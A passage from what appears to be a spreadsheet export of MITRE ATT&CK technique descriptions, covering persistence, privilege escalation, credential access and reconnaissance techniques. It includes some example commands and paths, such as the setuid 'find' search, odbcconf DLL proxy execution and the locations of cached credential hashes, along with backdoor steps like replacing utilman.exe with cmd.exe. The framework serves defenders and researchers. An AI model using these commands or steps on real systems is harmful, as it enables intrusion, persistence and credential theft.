Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;find&lt;/code&gt; command can also be used to search for such files. For example, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; can be used to find files with setuid set and &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)
https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.
https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1598.004</t>
  </si>
  <si>
    <t>Spearphishing Voice</t>
  </si>
  <si>
    <t>Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)
Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.
https://attack.mitre.org/techniques/T1598/004</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) 
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>T1548.005</t>
  </si>
  <si>
    <t>Temporary Elevated Cloud Access</t>
  </si>
  <si>
    <t>Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. 
Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)
Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) 
Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)
While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)
**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)
https://attack.mitre.org/techniques/T1548/005</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. &lt;code&gt;show ip route&lt;/code&gt;, &lt;code&gt;show ip interface&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  
Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). 
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories.
https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
